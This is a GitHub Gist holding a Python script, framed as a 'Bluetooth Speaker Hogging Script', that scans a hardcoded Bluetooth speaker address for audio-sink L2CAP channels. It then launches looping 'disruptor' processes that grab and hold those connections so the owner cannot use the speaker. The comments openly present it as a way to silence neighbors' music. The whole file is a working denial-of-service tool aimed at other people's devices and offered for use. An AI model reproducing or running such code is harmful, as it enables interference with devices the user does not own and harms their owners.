Last active
April 26, 2020 11:17
-
-
Save icedraco/41fa34ca2c9401270eb816ac42249be7 to your computer and use it in GitHub Desktop.
Designed to aggressively hold an open connection to a Bluetooth speaker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Bluetooth Speaker Hogging Script | |
# | |
# Designed to aggressively hold an open connection to a Bluetooth speaker. | |
# | |
# Particularly useful for when your neighbors have an "incompatible" taste in | |
# music and don't consider it a problem that they play it too loud. | |
# | |
# Requirements: | |
# sudo apt install libbluetooth-dev | |
# python3.7 -m pip install pybluez | |
from time import sleep | |
from multiprocessing import current_process, Process, Queue | |
from datetime import datetime | |
from typing import List | |
import bluetooth as bt | |
TARGET_BDADDR = 'A4:77:58:04:C6:C7' # Anker SoundCore | |
TARGET_PSM_LIST = [] # if you know the value(s) in advance, this will spare | |
# us the discovery run! | |
# reference: https://www.bluetooth.com/specifications/assigned-numbers/service-discovery/ | |
SVC_CLASS_AUDIO_SINK = '110B' | |
def main() -> int: | |
log = mklog('main') | |
target_bdaddr: str = TARGET_BDADDR | |
target_psms: List[int] = TARGET_PSM_LIST | |
while not target_psms: | |
log(f'discovering target PSM (port) for {target_bdaddr}...') | |
target_psms = discover_psm_debug(target_bdaddr) | |
if target_psms: | |
log('PSM FOUND:') | |
for p in target_psms: | |
log(f' * {target_bdaddr} -> {p}') | |
log() | |
else: | |
sleep(0.5) | |
log('starting disruptors...') | |
disruptor_procs = [start_disruptor(target_bdaddr, psm) for psm in target_psms] | |
while True: | |
try: | |
[p.join() for p in disruptor_procs] | |
break | |
except KeyboardInterrupt: | |
# wait for sub-processes to close | |
pass | |
log('shutdown complete') | |
return 0 | |
def p_disrupt(bdaddr: str, psm: int): | |
log = mklog() | |
log(f'Attempting to capture {bdaddr} (PSM {psm})...') | |
while True: | |
s = bt.BluetoothSocket(bt.L2CAP) | |
try: | |
s.connect((bdaddr, psm)) | |
log(f'CONNECTED TO {bdaddr} (PSM {psm})') | |
data = True # placeholder for do-while | |
while data: | |
data = s.recv(1024) # blocking call | |
if data: | |
log(f'[{len(data)} bytes] {repr(data)}') | |
except KeyboardInterrupt: | |
log(f'CTRL+C -> SHUTTING DOWN...') | |
break | |
except bt.btcommon.BluetoothError as ex: | |
log(ex) | |
sleep(0.1) | |
except bt._bluetooth.error: | |
raise | |
finally: | |
s.close() | |
log(f'disruptor shut down') | |
def discover_psm(bdaddr: str) -> List[int]: | |
""" | |
Discover Bluetooth L2CAP PSM list for AudioSink service at the given | |
address. | |
:param bdaddr: Bluetooth address of the host we are probing | |
:return: list of discovered PSM values | |
""" | |
return [ | |
c['port'] | |
for c | |
in bt.find_service(uuid=SVC_CLASS_AUDIO_SINK, address=bdaddr) | |
] | |
def discover_psm_debug(bdaddr: str) -> List[int]: | |
services = bt.find_service(address=bdaddr) | |
for s in services: | |
print(f' * {repr(s)}') | |
return [c['port'] for c in services] | |
def start_disruptor(bdaddr: str, psm: int) -> Process: | |
""" | |
Start a disruptor process against a given Bluetooth service | |
:param bdaddr: Bluetooth address of the target host | |
:param psm: Bluetooth PSM (L2CAP port) | |
:return: Disruptor process (started) | |
""" | |
proc_name = f'DISRUPTOR-{psm}' | |
proc = Process(target=p_disrupt, args=(bdaddr, psm), name=proc_name, daemon=True) | |
proc.start() | |
return proc | |
def mklog(name: str = ''): | |
name = name or current_process().name | |
def log(msg: str = ''): | |
print(f'[{datetime.now()}][{name}] {msg}') | |
return log | |
if __name__ == '__main__': | |
raise SystemExit(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment